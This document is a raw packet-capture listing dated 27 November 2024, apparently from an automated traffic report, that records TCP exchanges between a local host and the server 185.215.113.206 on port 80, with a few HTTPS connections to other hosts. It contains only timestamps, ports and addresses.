                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.851736069 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.851787090 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852210045 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852226019 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852247953 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852272987 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852456093 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852511883 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.852555037 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853442907 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853497028 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853555918 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853594065 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853796005 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.853811979 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.854458094 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.854562044 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.854603052 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.855463982 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.855524063 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.855587006 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.855633020 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.856463909 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.856506109 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.887043953 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.887083054 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.887173891 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.887588024 CET49841443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.887598991 CET4434984113.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996054888 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996074915 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996140003 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996558905 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996604919 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996706963 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.996757030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.997505903 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.997555971 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.997661114 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.997723103 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.998567104 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.998616934 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.998646975 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.998694897 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.999586105 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.999604940 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.999640942 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.999674082 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.000536919 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.000580072 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.000613928 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.000751972 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.001586914 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.001630068 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.002475023 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.002518892 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.002590895 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.002609015 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.002660036 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.003633976 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.003652096 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.003691912 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.003710985 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.004633904 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.004648924 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.005151987 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.005590916 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.005659103 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.005671024 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.005706072 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.006625891 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.006642103 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.006681919 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.007607937 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.007623911 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.007651091 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.007678986 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.008594990 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.008675098 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.008764029 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.009619951 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.009680033 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.009746075 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.009799004 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.010603905 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.010653973 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.010694981 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.010749102 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.011660099 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.011677980 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.011719942 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.012604952 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.012660027 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.012744904 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.012819052 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.013695955 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.013715029 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.013778925 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.014605045 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.014653921 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.014728069 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.014770031 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.015608072 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.015666008 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.016026974 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.016078949 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.016658068 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.016746998 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.016797066 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.017674923 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.017704964 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.017719984 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.017740011 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.018644094 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.018667936 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.018702030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.018721104 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.019632101 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.019681931 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.019690990 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.019721985 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.020682096 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.020699978 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.020730972 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.020746946 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.021647930 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.021681070 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.021692038 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.021719933 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.022660017 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.022677898 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.022718906 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.023698092 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.023714066 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.023746967 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.023773909 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.024627924 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.024674892 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.024727106 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.024770021 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.025635004 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.025794983 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.025857925 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.026669025 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.026684999 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.026720047 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.026750088 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.027633905 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.027682066 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.027707100 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.027741909 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.028651953 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.028700113 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.028713942 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.028744936 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.029665947 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.029717922 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.029795885 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.029864073 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.030683041 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.030698061 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.030735970 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.031706095 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.031722069 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.031747103 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.031765938 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.032675982 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.032740116 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.032741070 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.032855988 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.033736944 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.033754110 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.033778906 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.033799887 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.034713984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.034756899 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.034759998 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.034804106 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.035666943 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.035717964 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.035727024 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.035780907 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.036725044 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.036780119 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.036835909 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.036889076 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.037714958 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.037729979 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.037767887 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.037794113 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.038707972 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.038878918 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.038892031 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.038975000 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.039729118 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.039874077 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.039885998 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.039926052 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.040740013 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.040812016 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.040843010 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.040859938 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.041727066 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.041784048 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.042108059 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.042165041 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.042706013 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.042937994 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043162107 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043220997 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043699026 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043776035 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043823004 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.043868065 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.044717073 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.044750929 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.044784069 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.044810057 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.045696020 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.045763016 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.045974016 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.046071053 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.046699047 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.046750069 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.046907902 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.047023058 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.047699928 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.047763109 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.047774076 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.047817945 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.048698902 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.048744917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192359924 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192377090 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192506075 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192506075 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192910910 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.192980051 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.193073034 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.193149090 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.193767071 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.193833113 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.193876028 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.194854975 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.194931030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.195151091 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.195204973 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.195815086 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.195861101 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.195997953 CET8049785185.215.113.206192.168.2.7
